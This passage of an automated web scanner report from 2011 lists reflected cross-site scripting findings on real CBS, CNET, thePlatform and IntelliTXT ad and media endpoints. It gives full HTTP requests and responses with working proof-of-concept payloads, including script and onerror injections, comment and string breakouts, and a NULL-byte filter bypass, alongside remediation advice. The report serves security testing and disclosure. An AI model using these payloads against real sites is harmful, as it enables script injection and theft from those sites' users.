HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:43:45 GMT Server: Apache/2.2 Content-Length: 579 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:43:45 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1da3c4<a>4c61eada3db&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCAT='201:' CID='' TO BEACON T ...[SNIP]...
3.250. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://mads.cbsnews.com
Path:
/mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 980ec<a>36af9022da6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:46:39 GMT Server: Apache/2.2 Content-Length: 582 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:46:39 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1&980ec<a>36af9022da6=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCAT='201:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw3.cnet.com::161055 ...[SNIP]...
3.251. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mads.cbsnews.com
Path:
/mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload bfa1d*/alert(1)//5cd8092a524 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:43:15 GMT Server: Apache/2.2 Content-Length: 1249 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:43:15 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80&POS=100&cookiesOn=1&bfa1d*/alert(1)//5cd8092a524=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload 794ac<a>c0b2ca93af0 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:44:36 GMT Server: Apache/2.2 Content-Length: 579 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:44:36 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544794ac<a>c0b2ca93af0&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCAT='201:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUN ...[SNIP]...
The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload d3a43*/alert(1)//493d8009501 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:42 GMT Server: Apache/2.2 Content-Length: 1245 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:42 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291d3a43*/alert(1)//493d8009501&IREFER_HOST=google.com&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the &adfile request parameter is copied into the HTML document as plain text between tags. The payload 8f464<a>63298d8b7ed was submitted in the &adfile parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?&_RGROUP=19412&&CNET-BRAND-ID=55&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=162&ASSET_HOST=adimg.cnet.com&&&&&&&ENG:DATETIME=2011.10.05.14.37.53&SYS:RQID=00phx1-ad-e20:4E8C481E80375F&&REFER_HOST=tag.admeld.com&&&&&DVAR_LB_MPU=1&&adfile=10874/11/541411_wc.ca8f464<a>63298d8b7ed HTTP/1.1 Host: mads.cnet.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://mads.cnet.com/mac-ad?CELT=ifc&BRAND=55&SITE=162&ADSTYLE=NOOVERGIF&_RGROUP=19412 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="&_RGROUP=19412&&CNET-BRAND-ID=55&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=162&ASSET_HOST=adimg.cnet.com&&&&&&&ENG:DATETIME=2011.10.05.14.37.53&SYS:RQID=00phx1-ad-e20:4E8C481E80375F&&REFER_HOST=tag.admeld.com&&&&&DVAR_LB_MPU=1&&adfile=10874/11/541411_wc.ca8f464<a>63298d8b7ed" _REQ_NUM="0" --> ...[SNIP]...
The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload defaf"><img%20src%3da%20onerror%3dalert(1)>bb57a51f09a was submitted in the BRAND parameter. This input was echoed as defaf"><img src=a onerror=alert(1)>bb57a51f09a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /mac-ad?CELT=ifc&BRAND=defaf"><img%20src%3da%20onerror%3dalert(1)>bb57a51f09a&SITE=162&ADSTYLE=NOOVERGIF&_RGROUP=17235 HTTP/1.1 Host: mads.cnet.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/728x90/cbsnews_atf?t=1317839892743&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F10%2F05%2Fnational%2Fmain20115857.shtml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:58 GMT Server: Apache/2.2 Pragma: no-cache Cache-Control: no-cache, must-revalidate Vary: Accept-Encoding Content-Length: 2582 Content-Type: text/html Expires: Wed, 05 Oct 2011 18:38:58 GMT
<!-- MAC ad --> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CNET ad iframe content</title> <style ...[SNIP]... <iframe src="http://mads.cnet.com/mac-ad?&_RGROUP=17235&&CNET-BRAND-ID=defaf"><img src=a onerror=alert(1)>bb57a51f09a&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=162&ASSET_HOST=adimg.cnet.com&&&&&&&ENG:DATETIME=2011.10.05.14.38.58&SYS:RQID=01phx1-ad-e19:4E8C5289757104&a ...[SNIP]...
The value of the BRAND request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce2f0"><script>alert(1)</script>1b875d970fa was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mac-ad?CELT=ifc&BRAND=55ce2f0"><script>alert(1)</script>1b875d970fa&SITE=162&ADSTYLE=NOOVERGIF&_RGROUP=17235 HTTP/1.1 Host: mads.cnet.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/728x90/cbsnews_atf?t=1317839892743&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F10%2F05%2Fnational%2Fmain20115857.shtml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:47 GMT Server: Apache/2.2 Pragma: no-cache Cache-Control: no-cache, must-revalidate Vary: Accept-Encoding Content-Length: 2112 Content-Type: text/html Expires: Wed, 05 Oct 2011 18:38:47 GMT
<!-- MAC ad --> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CNET ad iframe content</title> <style ...[SNIP]... <img src="http://adlog.com.com/adlog/i/r=17235&sg=440453&o=&h=cn&p=2&b=55ce2f0"><script>alert(1)</script>1b875d970fa&l=en_US&site=162&pt=&nd=&pid=&cid=&pp=&e=&rqid=01phx1-ad-e15:4E8C71394A7D8E&orh=admeld.com&ort=&oepartner=&epartner=&ppartner=&pdom=tag.adme ...[SNIP]...
The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 68ffb<a>5ae0af89966 was submitted in the CELT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?CELT=ifc68ffb<a>5ae0af89966&BRAND=55&SITE=162&ADSTYLE=NOOVERGIF&_RGROUP=17235 HTTP/1.1 Host: mads.cnet.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/728x90/cbsnews_atf?t=1317839892743&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F10%2F05%2Fnational%2Fmain20115857.shtml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:25 GMT Server: Apache/2.2 Content-Length: 379 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: text/plain Expires: Wed, 05 Oct 2011 18:38:25 GMT
<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="CELT=ifc68ffb<a>5ae0af89966&BRAND=55&SITE=162&ADSTYLE=NOOVERGIF&_RGROUP=17235" _REQ_NUM="0" --><!-- MAC-AD STATUS: ; MAPPING UNEXPECTED CELT "ifc68 ...[SNIP]...
The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0015a66"><script>alert(1)</script>8909c09cf6 was submitted in the SITE parameter. This input was echoed as 15a66"><script>alert(1)</script>8909c09cf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /mac-ad?CELT=ifc&BRAND=55&SITE=%0015a66"><script>alert(1)</script>8909c09cf6&ADSTYLE=NOOVERGIF&_RGROUP=17235 HTTP/1.1 Host: mads.cnet.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/728x90/cbsnews_atf?t=1317839892743&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F10%2F05%2Fnational%2Fmain20115857.shtml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:25 GMT Server: Apache/2.2 Pragma: no-cache Cache-Control: no-cache, must-revalidate Vary: Accept-Encoding Content-Length: 2531 Content-Type: text/html Expires: Wed, 05 Oct 2011 18:39:25 GMT
<!-- MAC ad --> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CNET ad iframe content</title> <style ...[SNIP]... <iframe src="http://mads.cnet.com/mac-ad?&_RGROUP=17235&&CNET-BRAND-ID=55&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=.15a66"><script>alert(1)</script>8909c09cf6&ASSET_HOST=adimg.cnet.com&&&&&&&ENG:DATETIME=2011.10.05.14.39.25&SYS:RQID=00phx1-ad-e18:4E8C697256104B&&REFER_HOST=tag.admeld.com&&&&&&a ...[SNIP]...
The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a084c"><script>alert(1)</script>7bc4b8d56a was submitted in the SITE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mac-ad?CELT=ifc&BRAND=55&SITE=162a084c"><script>alert(1)</script>7bc4b8d56a&ADSTYLE=NOOVERGIF&_RGROUP=17235 HTTP/1.1 Host: mads.cnet.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/728x90/cbsnews_atf?t=1317839892743&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F10%2F05%2Fnational%2Fmain20115857.shtml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:05 GMT Server: Apache/2.2 Pragma: no-cache Cache-Control: no-cache, must-revalidate Vary: Accept-Encoding Content-Length: 2538 Content-Type: text/html Expires: Wed, 05 Oct 2011 18:39:05 GMT
<!-- MAC ad --> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CNET ad iframe content</title> <style ...[SNIP]... <a href="http://adlog.com.com/adlog/c/r=17235&sg=441168&o=&h=cn&p=2&b=55&l=en_US&site=162a084c"><script>alert(1)</script>7bc4b8d56a&pt=&nd=&pid=&cid=&pp=&e=&rqid=01phx1-ad-e18:4E8C4853807EC4&orh=admeld.com&oepartner=&epartner=&ppartner=&pdom=tag.admeld.com&cpnmodule=&count=&a ...[SNIP]...
The value of the _RGROUP request parameter is copied into an HTML comment. The payload 41752--><a>118c25f8717 was submitted in the _RGROUP parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /mac-ad?CELT=ifc&BRAND=55&SITE=162&ADSTYLE=NOOVERGIF&_RGROUP=1723541752--><a>118c25f8717 HTTP/1.1 Host: mads.cnet.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://tag.admeld.com/ad/iframe/489/cbsnews/728x90/cbsnews_atf?t=1317839892743&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer=http%3A%2F%2Fwww.cbsnews.com%2Fstories%2F2011%2F10%2F05%2Fnational%2Fmain20115857.shtml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:37 GMT Server: Apache/2.2 Pragma: no-cache Cache-Control: no-cache, must-revalidate Vary: Accept-Encoding Content-Length: 1345 Content-Type: text/html Expires: Wed, 05 Oct 2011 18:39:37 GMT
<!-- MAC ad --> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>CNET ad iframe content</title> <style ...[SNIP]... <!-- NO AD TEXT: _QUERY_STRING="CELT=ifc&BRAND=55&SITE=162&ADSTYLE=NOOVERGIF&_RGROUP=1723541752--><a>118c25f8717" _REQ_NUM="0" --> ...[SNIP]...
The value of the targetel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35d2c"%3balert(1)//7024a5a49a5 was submitted in the targetel parameter. This input was echoed as 35d2c";alert(1)//7024a5a49a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /remoteLogin.gsp?targetel=loginbox35d2c"%3balert(1)//7024a5a49a5 HTTP/1.1 Host: manage.theplatform.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 19:32:51 GMT Content-Type: text/html; charset=utf-8 Content-Length: 49254 Connection: close Server: Jetty(6.1.5)
/* * jQuery 1.2.1 - New Wave Javascript * * Copyright (c) 2007 John Resig (jquery.com) * Dual licensed under the MIT (MIT-LICENSE.txt) * and GPL (GPL-LICENSE.txt) licenses. * * $Date: 2007-09- ...[SNIP]... <input type='submit' id='btnRemoteLogin' value='Sign In'/>").appendTo("#loginControls"); } }; }
$j(document).ready(function() { var rl = new RemoteLogin("loginbox35d2c";alert(1)//7024a5a49a5"); rl.render(); $j("#loginUsernameInput").focus(); });
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 92609%3balert(1)//d415f79ee33 was submitted in the jscallback parameter. This input was echoed as 92609;alert(1)//d415f79ee33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: text/javascript Content-Length: 65 Date: Wed, 05 Oct 2011 18:42:30 GMT Age: 0 Connection: keep-alive
3.263. http://newyork.cbslocal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newyork.cbslocal.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a3d4'-alert(1)-'14e80e1bad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript;charset=iso-8859-1 Vary: Accept-Encoding Content-Length: 11488 Date: Wed, 05 Oct 2011 18:38:37 GMT Age: 0 Connection: keep-alive
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7aa7d%3balert(1)//26062cbd7e3 was submitted in the jscallback parameter. This input was echoed as 7aa7d;alert(1)//26062cbd7e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript;charset=iso-8859-1 Vary: Accept-Encoding Content-Length: 6933 Date: Wed, 05 Oct 2011 18:43:15 GMT Age: 0 Connection: keep-alive
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... et('initskip',0);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback07aa7d;alert(1)//26062cbd7e3({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
3.265. http://newyork.cbslocal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://newyork.cbslocal.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91d99"-alert(1)-"c80c06ca116 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript;charset=iso-8859-1 Vary: Accept-Encoding Content-Length: 6914 Date: Wed, 05 Oct 2011 18:43:31 GMT Age: 0 Connection: keep-alive
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... rome/14.0.835.187 Safari/535.1","REGIONNAME":"","muid":"","city":"","ipid":25815,"jscallback":"$iTXT.js.callback0","reg":"--","refurl":"http://newyork.cbslocal.com/category/links-numbers/","rcc":"--","91d99"-alert(1)-"c80c06ca116":"1","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');}$iTXT.glob. ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d693a'%3bd123ff508e was submitted in the REST URL parameter 6. This input was echoed as d693a';d123ff508e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /widget/city/New-York/deals_blue/javascript/local-deals-0d693a'%3bd123ff508e HTTP/1.1 Host: offers.cbslocal.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://newyork.cbslocal.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 12887 Content-Type: text/javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 05 Oct 2011 19:34:05 GMT
if (document.getElementById('local-deals-0d693a';d123ff508e') == null) { document.write(' <!--Containing DIV--><div style="padding:0px;width:300px;height:360px;font-family:\'Helvetica N ...[SNIP]...
